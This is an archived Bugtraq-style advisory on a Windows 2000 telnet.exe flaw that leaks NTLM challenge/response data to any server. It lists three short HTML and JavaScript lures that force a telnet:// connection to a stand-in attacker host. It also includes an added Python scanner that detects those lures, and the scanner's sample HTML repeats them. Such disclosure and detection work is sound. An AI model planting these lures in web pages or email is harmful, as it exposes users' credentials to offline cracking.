Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
BID:1683
Info
| Bugtraq ID: | 1683 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 14 2000 12:00AM |
| Updated: | Sep 14 2000 12:00AM |
| Credit: | Discovered by DilDog <[email protected]> and publicized in an @Stake Security Advisory (A091400-1) on September 14, 2000. Additional information provided by Monti <[email protected]>. |
| Vulnerable: | Microsoft Windows 2000 Server SP1; Microsoft Windows 2000 Server; Microsoft Windows 2000 Professional SP1; Microsoft Windows 2000 Professional; Microsoft Windows 2000 Advanced Server SP1; Microsoft Windows 2000 Advanced Server |
| Not Vulnerable: | |
Discussion
By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 uses Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client attempts NTLM authentication regardless of whether the host is a Windows telnet server. A server under the control of a third party can therefore record the NTLM challenge/response exchange and subsequently crack it offline, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated by the tool "L0phtcrack."
Forcing a telnet session from a remote target is trivial because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. automatically open URLs with a "telnet://" prefix in the default telnet client (normally telnet.exe). The following are some examples of how a web page or e-mail could open a telnet session to a specified rogue server:
1) frame src=telnet://target
2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker"
3) window.open("telnet://target")
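The three vectors listed above are simple enough to screen for at a mail gateway or web proxy before the content reaches a browser. The following scanner is an added example written for this page; it is not part of the advisory or any @stake tool. It uses only the Python standard library and goes slightly beyond the advisory's list by also checking `href`/`data` attributes and `location` assignments in scripts, since the same automatic handler launch applies to any `telnet://` link. The sample HTML is constructed for the demonstration and uses the advisory's own placeholder host names.

```python
"""Flag HTML that would make a browser or mail client launch the default
telnet client (and thus an NTLM handshake from telnet.exe) toward a
third-party host. Added example for a content filter; not from the advisory."""
import re
from html.parser import HTMLParser

# A telnet:// URL: scheme followed by anything up to whitespace or a delimiter.
TELNET_URL = re.compile(r"""telnet://[^\s"'<>)]+""", re.IGNORECASE)
# URL=... inside a meta refresh "content" value.
REFRESH_URL = re.compile(r"url\s*=\s*(\S+)", re.IGNORECASE)


class TelnetUrlFinder(HTMLParser):
    """Collect (vector, url) pairs for every telnet:// reference found."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        attrs = {name: (value or "").strip() for name, value in attrs}
        if tag == "script":
            self._in_script = True
        # Vector 1: <frame src=telnet://...>, plus iframe/a/object variants.
        for attr in ("src", "href", "data"):
            if attr in attrs and TELNET_URL.match(attrs[attr]):
                self.hits.append((f"{tag}[{attr}]", attrs[attr]))
        # Vector 2: <meta http-equiv="refresh" content="0;URL=telnet://...">
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.search(attrs.get("content", ""))
            if m and TELNET_URL.match(m.group(1)):
                self.hits.append(("meta[refresh]", m.group(1)))

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # Vector 3: window.open("telnet://...") or location = "telnet://..."
        # inside a script block; html.parser hands script bodies to handle_data.
        if self._in_script:
            for url in TELNET_URL.findall(data):
                self.hits.append(("script", url))


def find_telnet_urls(html):
    """Return a list of (vector, url) tuples; empty means nothing to flag."""
    parser = TelnetUrlFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


def is_suspicious(html):
    """True when the document would trigger an outbound telnet:// launch."""
    return bool(find_telnet_urls(html))


# Constructed sample mixing the advisory's three vectors with a benign frame.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker">
</head><body>
<frame src=telnet://target>
<iframe src="http://example.invalid/page"></iframe>
<script>window.open("telnet://target")</script>
</body></html>"""

if __name__ == "__main__":
    for vector, url in find_telnet_urls(SAMPLE_HTML):
        print(f"{vector:14s} -> {url}")
```

Run as a script it lists one hit per vector; as a module, `is_suspicious()` is the single call a filter would make per message or response body. Plain-text occurrences of `telnet://` outside markup are deliberately not flagged, since only markup and script cause an automatic launch.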
Exploit / POC
DilDog <[email protected]> has released the following proof-of-concept code:
Solution / Fix
References